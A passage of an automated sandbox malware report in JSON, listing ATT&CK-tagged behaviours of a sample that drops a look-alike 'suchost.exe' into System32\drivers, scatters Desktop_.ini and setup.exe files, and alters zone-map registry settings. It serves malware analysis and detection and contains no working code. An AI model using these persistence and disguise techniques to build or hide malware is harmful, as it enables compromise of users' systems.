\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.ENU\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.EN\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29C57DBEE1BB2ABB438364A7382082018120EED8212E66A5FA6DC67A2E2D8AE3.ENU\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29C57DBEE1BB2ABB438364A7382082018120EED8212E66A5FA6DC67A2E2D8AE3.EN\"\n \"suchost.exe\" trying to access non-existent file \"C:\\Windows\\system32\\drivers\\suchost.ENU\"\n \"suchost.exe\" trying to access non-existent file \"C:\\Windows\\system32\\drivers\\suchost.EN\"\n \"suchost.exe\" trying to access non-existent file \"A:\"\n \"suchost.exe\" trying to access non-existent file \"C:\\Windows\\System32\\drivers\\SUCHOST.ENU\"\n \"suchost.exe\" trying to access non-existent file \"C:\\Windows\\System32\\drivers\\SUCHOST.EN\"\n \"suchost.exe\" trying to access non-existent file \"C:\\$Recycle.Bin\\DESKTOP_.INI\"\n \"suchost.exe\" trying to access non-existent file \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DESKTOP_.INI\"\n \"suchost.exe\" trying to access non-existent file \"B:\"\n \"suchost.exe\" trying to access non-existent file \"D:\"\n \"suchost.exe\" trying to access non-existent file \"E:\"\n \"suchost.exe\" trying to access non-existent file \"F:\"\n \"suchost.exe\" trying to access non-existent file \"G:\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"suchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" touched file \"C:\\Windows\\System32\\drivers\\suchost.exe\"\n \"suchost.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"suchost.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"suchost.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"suchost.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"suchost.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"suchost.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"suchost.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"suchost.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" writes file \"c:\\windows\\system32\\drivers\\suchost.exe\"\n \"suchost.exe\" writes file \"c:\\$recycle.bin\\desktop_.ini\"\n \"suchost.exe\" writes file \"c:\\$recycle.bin\\s-1-5-21-2092356043-4041700817-663127204-1001\\desktop_.ini\"\n \"suchost.exe\" writes file \"c:\\share\\¡¡¡¡¡¡.exe\"\n \"suchost.exe\" writes file \"c:\\msocache\\desktop_.ini\"\n \"suchost.exe\" writes file \"c:\\msocache\\all users\\desktop_.ini\"\n \"suchost.exe\" writes file \"c:\\msocache\\all users\\{90140000-0011-0000-0000-0000000ff1ce}-c\\desktop_.ini\"\n \"suchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\83$$.ico\"\n \"suchost.exe\" writes file \"c:\\msocache\\all users\\{90140000-0011-0000-0000-0000000ff1ce}-c\\setup.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" queries basic process information of the \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (UID: 3536)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"29C57DBEE1BB2ABB438364A7382082018120EED8212E66A5FA6DC67A2E2D8AE3\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"suchost.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"setup.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe]- [targetUID: 00000000-00002084]\n \"7zFM.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"7zG.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Uninstall.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"suchost.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\drivers\\suchost.exe]- [targetUID: 00000000-00003536]\n \"DW20.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE]- [targetUID: 00000000-00002084]\n \"~DFDDB407B1FFA0F486.TMP\" has type \"data\"- [targetUID: N/A]\n \"~DFD6D5AC47B6E58AAE.TMP\" has type \"data\"- [targetUID: N/A]\n \"RecoveryStore._9E7C290F-E7A0-11EF-95C4-00505691A508_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"_9E7C2911-E7A0-11EF-95C4-00505691A508_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"42_.Ico\" has type \"MS Windows icon resource - 1 icon 32x32 4 colors\"- [targetUID: N/A]\n \"77_.Ico\" has type \"MS Windows icon resource - 1 icon 32x32 4 colors\"- [targetUID: N/A]\n \"46_.Ico\" has type \"MS Windows icon resource - 1 icon 32x32 4 colors\"- [targetUID: N/A]\n \"83_.Ico\" has type \"MS Windows icon resource - 1 icon 32x32 4 colors\"- [targetUID: N/A]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- [targetUID: 00000000-00002084]\n \"suchost.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"21_.Ico\" has type \"MS Windows icon resource - 1 icon 32x32 4 colors\"- [targetUID: N/A]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\$Recycle.Bin\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Desktop_.ini]- [targetUID: 00000000-00002084]\n \"Desktop_.ini\" has type \"ASCII text with no line terminators\"- Location: [C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Desktop_.ini]- [targetUID: 00000000-00002084]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"~DFDDB407B1FFA0F486.TMP\" has type \"data\"\n \"~DFD6D5AC47B6E58AAE.TMP\" has type \"data\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"suchost.exe\" called \"FindResourceW\" with parameter \"2528488\" - (UID: 00000000-00002084)\n \"suchost.exe\" called \"FindResourceW\" with parameter \"6\" - (UID: 00000000-00002084)\n \"suchost.exe\" called \"FindResourceW\" with parameter \"103\" - (UID: 00000000-00002084)\n \"suchost.exe\" called \"FindResourceW\" with parameter \"5\" - (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"suchost.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"suchost.exe\" called \"LoadResource with parameter {'hModule': '760545282', 'hResInfo': '761328232'}\" (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadResource with parameter {'hModule': '760545282', 'hResInfo': '761328200'}\" (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadResource with parameter {'hModule': '770572290', 'hResInfo': '771494456'}\" (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadResource with parameter {'hModule': '770572290', 'hResInfo': '771494408'}\" (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")\n \"suchost.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"suchost.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100750a006c002b00000000000000bc030000f81e2400385f2700010000008862270084fe9d0100291f770000000000000000bc03000088622700b0fe9d012f7c397500002400000000009062270000000000000000000000000000000000000002009062270014ff9d01ba3a420000004000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"net.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0801800e4fb5000145c1f77435c1f77b0fc500001000000940116000100000064fb5000935c207740832777d4a01f77cd8b5677b0fc5000010000000100000010a818000000000034fb500064fb5000d0fb500095e11b7751741900feffffffd4a01f771bbe39750000a97600000000 (UID: 00000000-00000768)\n \"net.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c080130090fb4c00145c1f77435c1f775cfc4c0001000000940111000100000010fb4c00935c207740832777d4a01f77b98b4a775cfc4c0001000000010000000091130000000000e0fa4c0010fb4c007cfb4c0095e11b7751741900feffffffd4a01f771bbe39750000a97600000000 (UID: 00000000-00003456)\n \"net1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d89f2000dcf44600145c1f77435c1f77a8f546000100000094011e00010000005cf44600935c207740832777d4a01f7712894077a8f54600010000000100000010612000000000002cf446005cf44600c8f4460095e11b77b6791900feffffffd4a01f771bbe39750000a97600000000 (UID: 00000000-00001284)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0058782a0053782a00000000000000000000002700000000018cda120000000000f0e7120095e11b77e7fc2700feffffff435c1f7750591f77aa000000b800000052782a0050782a0014dc12004ce0120000000000000000000000000000000000000000000000000000000000000000001c5c1e7760d83975ffffffff17000000c4db12002400000003000000b4e01200e0e512004ce0120086000000f0db120096ed1f777a782a00a06af5748600000014dc12004ce012000000000086008800a06af57414dc1200916cf5747a782a00a06af574a06af57484e0120002020000 (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003536)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003172)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009cfb0e02000000004e000000ecfb0e02feffffff74fb0e02cf002077d6002077620836754e00000027000000ecfb0e020000000048fb0e0200000000b0fb0e02 (UID: 00000000-00003172)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b1f7792bc9b7600000000940124000000240000000000000000000a006c002b00000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 